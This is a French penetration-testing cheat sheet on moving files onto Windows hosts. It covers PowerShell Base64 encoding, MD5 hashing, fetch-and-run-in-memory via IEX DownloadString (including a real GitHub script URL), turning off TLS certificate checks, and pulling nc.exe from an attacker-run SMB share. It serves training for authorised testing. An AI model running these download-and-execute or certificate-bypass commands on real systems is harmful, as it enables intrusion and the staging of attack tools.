Nym0x

Transfert de fichiers 🚧

Environnement Windows

Encodage & Hachage

Certaines opérations de transferts de fichiers demanderont à ce que celui-ci soit encodé en Base64 :

# Encoder
$Text = $CLEAR_TEXT
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
$EncodedText =[Convert]::ToBase64String($Bytes)
$EncodedText

# Décoder
$EncodedText = $BASE64_STRING
$DecodedText = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($EncodedText))
$DecodedText

De plus, afin de tester l’intégrité d’un fichier que l’on aura transféré, il est également bon de savoir réaliser une signature md5 :

Get-FileHash $FILE -Algorithm md5 | Format-List

Download

Plusieurs techniques existent sous Windows pour télécharger un fichier distant, que ce soit en utilisant PowerShell, SMB ou FTP :

DownloadFile

(New-Object Net.WebClient).DownloadFile($TARGET_FILE_PATH,$FILE_NAME_OUTPUT)

# Async
(New-Object Net.WebClient).DownloadFileAsync($TARGET_FILE_PATH,$FILE_NAME_OUTPUT)

Invoke-Expression

Cette méthode ne stocke pas le fichier sur le disque mais l’exécute en mémoire.

IEX (New-Object Net.WebClient).DownloadString($TARGET_FILE_PATH)

# Ou, avec un pipe
(New-Object Net.WebClient).DownloadString($TARGET_FILE_PATH) | IEX

Invoke-WebRequest

Invoke-WebRequest $TARGET_FILE_PATH -OutFile $FILE_NAME_OUTPUT

Erreurs courantes

Lorsque la configuration first-launch d’Internet Explorer n’a pas été effectuée, les téléchargements avec Invoke-WebRequest seront bloqués et l’erreur suivantes s’affichera :

Invoke-WebRequest : The response content cannot be parsed because the Internet Explorer engine is not available, or Internet Explorer's first-launch configuration is not complete. Specify the UseBasicParsing parameter and try again.

Il faudra alors ajouter le flag -UseBasicParsing à la commande.

Une autre erreur lors des téléchargements PowerShell est liée au canal sécurisé SSL/TLS lorsque le certificat n’est pas approuvé. On peut contourner cette erreur avec la commande suivante :

IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')

Exception calling "DownloadString" with "1" argument(s): "The underlying connection was closed: Could not establish trust
relationship for the SSL/TLS secure channel."

[...]

PS C:\htb> [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}

Il est possible de monter un serveur SMB depuis une machine attaquante Linux et d’y télécharger les fichiers présents depuis Windows.

Tout d’abord, monter le serveur SMB avec smbserver.py :

sudo smbserver.py share -smbv2support /tmp/shared_folder -user pentest -password pentest

Puis depuis Windows, monter le serveur avec net use :

net use n: \\$SERVER_IP\shared_folder /user:pentest pentest

Enfin, copier le fichier souhaité :

copy n:\nc.exe

Upload

Environnement Linux